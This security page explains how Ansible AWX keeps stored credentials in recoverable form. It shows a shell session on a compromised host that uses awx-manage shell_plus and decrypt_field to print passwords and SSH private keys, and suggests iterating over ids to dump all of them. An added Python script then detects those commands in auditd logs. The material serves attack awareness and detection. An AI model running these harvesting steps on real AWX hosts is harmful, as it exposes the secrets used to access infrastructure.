Ansible AWX
Ansible AWX is the open-source equivalent of the commercial Ansible Tower. AWX provides a web-based user interface, REST API, and task engine built on top of Ansible. It is one of the upstream projects for Red Hat Ansible Automation Platform.
Ansible AWX installations come with three default Docker containers: one for the web interface, one for its database, and one for performing tasks (known as Jobs).
One notable feature is 'Credentials', which enables administrators to store credentials, private keys, and other sensitive information that Ansible AWX uses for authentication when launching Jobs against remote machines.
Ansible AWX uses SSH to connect to remote hosts (or the Windows equivalent). No matter what type of secret is used (private key, password, etc.), it must be decrypted before AWX connects to the remote host, so stored credentials are kept in a recoverable form. The same decrypt function can be used maliciously to harvest all saved credentials in plaintext.
Credential Harvesting Example
The decrypt_field utility can extract plaintext credentials:
[root@victimHost ~]# docker exec -it awx_task /bin/bash
bash-4.4# awx-manage shell_plus
>>> from awx.main.utils import decrypt_field
>>> creds = Credential.objects.get(name="vSphere-01")
>>> print(decrypt_field(creds, "password"))
H************************
>>> creds = Credential.objects.get(name="admin-id_rsa")
>>> print(decrypt_field(creds, "ssh_key_data"))
-----BEGIN RSA PRIVATE KEY-----
M************************
By modifying the query parameter from name to id, an attacker could iterate through and decrypt all stored credentials in the system, including passwords and SSH private keys.
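
A detection-side counterpart to the session above, as an added example that is not part of the original page: it scans auditd EXECVE records for the two commands shown there (docker exec into awx_task, and awx-manage shell_plus). The log lines are constructed, and the rule names, the extra "shell" subcommand, and the presence of host auditd logging for execve calls are assumptions.

```python
import re

# Constructed auditd EXECVE records (sample data, not from a real host).
SAMPLE_LOG = """\
type=EXECVE msg=audit(1700000001.100:501): argc=5 a0="docker" a1="exec" a2="-it" a3="awx_task" a4="/bin/bash"
type=EXECVE msg=audit(1700000009.250:502): argc=2 a0="awx-manage" a1="shell_plus"
type=EXECVE msg=audit(1700000020.000:503): argc=3 a0="docker" a1="logs" a2="awx_web"
type=EXECVE msg=audit(1700000031.700:504): argc=2 a0="awx-manage" a1="migrate"
"""

TASK_CONTAINER = "awx_task"                   # container name used on this page
INTERACTIVE_SHELLS = {"shell_plus", "shell"}  # "shell" (plain Django) added as an assumption

ID_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
ARG_RE = re.compile(r'\ba(\d+)=("([^"]*)"|(?:[0-9A-Fa-f]{2})+)')

def parse_execve(line):
    """Return (event_id, argv) for an auditd EXECVE record, or None."""
    m = ID_RE.search(line)
    if not line.startswith("type=EXECVE") or not m:
        return None
    args = {}
    for idx, raw, quoted in ARG_RE.findall(line):
        # auditd writes arguments with spaces/special bytes as bare hex
        args[int(idx)] = quoted if raw.startswith('"') else bytes.fromhex(raw).decode("utf-8", "replace")
    return int(m.group(1)), [args[i] for i in sorted(args)]

def classify(argv):
    """Name the rule an argv trips, or None."""
    if not argv:
        return None
    exe = argv[0].rsplit("/", 1)[-1]
    if exe == "docker" and "exec" in argv[1:] and TASK_CONTAINER in argv:
        return "exec-into-task-container"
    if exe == "awx-manage" and len(argv) > 1 and argv[1] in INTERACTIVE_SHELLS:
        return "awx-manage-interactive-shell"
    return None

def detect(log_text):
    """Return [(event_id, rule, command_line)] for every suspicious EXECVE record."""
    hits = []
    for line in log_text.splitlines():
        parsed = parse_execve(line.strip())
        rule = classify(parsed[1]) if parsed else None
        if rule:
            hits.append((parsed[0], rule, " ".join(parsed[1])))
    return hits

if __name__ == "__main__":
    for event_id, rule, cmd in detect(SAMPLE_LOG):
        print(f"event {event_id}: {rule}: {cmd}")
```

Neither command is routine on a healthy AWX host, so a hit on either rule is worth correlating with the operator's change record before the stored credentials are treated as still secret.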